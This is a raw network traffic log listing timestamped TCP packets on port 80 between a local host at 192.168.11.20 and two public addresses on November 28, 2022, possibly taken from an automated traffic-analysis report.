Nov 28, 2022 16:37:02.436908960 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.436988115 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437089920 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437146902 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437201023 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437257051 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437258005 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437302113 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437319994 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437417984 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437484026 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437491894 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437580109 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437630892 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437697887 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437700033 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.437851906 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.437907934 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438007116 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438067913 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438128948 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438169003 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438250065 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438256025 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438327074 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438363075 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438453913 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438491106 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438545942 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438566923 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438613892 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438684940 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438750029 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438805103 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438841105 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.438896894 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.438963890 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439012051 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439078093 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439120054 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439208031 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439291000 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439337969 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439357996 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439415932 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439465046 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439482927 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439542055 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439564943 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439632893 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439781904 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439841032 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439886093 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.439945936 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.439984083 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440033913 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440064907 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440102100 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440171957 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440217972 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440248966 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440373898 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440397024 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440442085 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440496922 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440552950 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440624952 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440668106 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440697908 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440893888 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.440903902 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.440984964 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.441042900 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.441057920 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.441138029 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.441262007 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.487751007 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.487839937 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.487905979 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.487972021 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.488012075 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.488081932 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.488152981 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.489581108 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.489674091 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.489866018 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.489866018 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.490449905 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.490534067 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.490613937 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.490745068 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.490834951 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.490977049 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491040945 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491066933 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491159916 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491161108 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491200924 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491293907 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491394997 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491420031 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491453886 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491527081 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491574049 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491673946 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491719961 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491765976 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491821051 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491884947 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.491913080 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.491985083 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.492059946 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.492084026 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.492135048 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.492136955 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.492218018 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.492356062 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.598684072 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:02.607892990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:02.608124018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:02.608408928 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:02.617386103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671390057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671511889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671583891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671638966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671694040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671749115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671803951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671801090 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.671802044 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.671859026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671912909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.671960115 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.671966076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672019005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672071934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672123909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672132969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.672132969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.672132969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.672178984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672221899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.672306061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.672467947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.672467947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.674726963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.674818993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.674879074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.674905062 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.674933910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675009966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675071955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675082922 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675082922 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675163031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675250053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675249100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675250053 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675309896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675365925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675419092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675421953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675506115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675561905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675586939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675586939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675616026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675671101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.675760984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675760984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675929070 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675929070 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.675929070 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.681313992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681395054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681510925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681514025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.681591034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681658983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681695938 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.681755066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681835890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.681864023 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.681926012 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.682343006 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.688581944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.688676119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.688755989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.688844919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.688911915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.688967943 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.688968897 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689002037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689078093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689136028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689136982 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689136982 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689191103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689246893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689300060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689304113 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689305067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689352989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689407110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689460993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689477921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689477921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689513922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689568996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689642906 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689644098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689740896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689816952 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689816952 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.689909935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.689982891 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690007925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690072060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690125942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690150976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690179110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690232038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690287113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690324068 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690324068 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690494061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690494061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.690658092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690833092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690897942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.690952063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691005945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691004992 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691060066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691112995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691167116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691198111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691198111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691344976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691344976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691509008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691521883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691682100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691692114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691757917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691812992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691867113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691905022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691920042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.691963911 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.691973925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692028999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692146063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692146063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692326069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692492962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692588091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692656994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692693949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692715883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692775965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692835093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692893028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.692919970 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692919970 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.692951918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693150043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.693317890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693320990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.693320990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.693481922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693551064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693603992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693619013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693634987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693650007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693665028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.693753004 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.693753004 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.693924904 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.694077015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.694181919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.694232941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.694264889 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.694434881 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715214968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715234995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715249062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715290070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715303898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715320110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715337038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715349913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715362072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715383053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715396881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715409040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715420961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715547085 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715547085 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715629101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715703964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715715885 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715789080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715812922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715835094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715861082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715884924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715889931 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715889931 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.715925932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715953112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715975046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.715996027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716017008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716031075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716053963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.716249943 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.716428041 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.716428041 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.716581106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716706038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716734886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716753960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716766119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716780901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716793060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716804981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716840029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716852903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716865063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716876030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.716943979 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.716943979 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.717112064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.717112064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.760814905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760843992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760860920 CET	80	49830	104.21.2.6	192.168.11.20
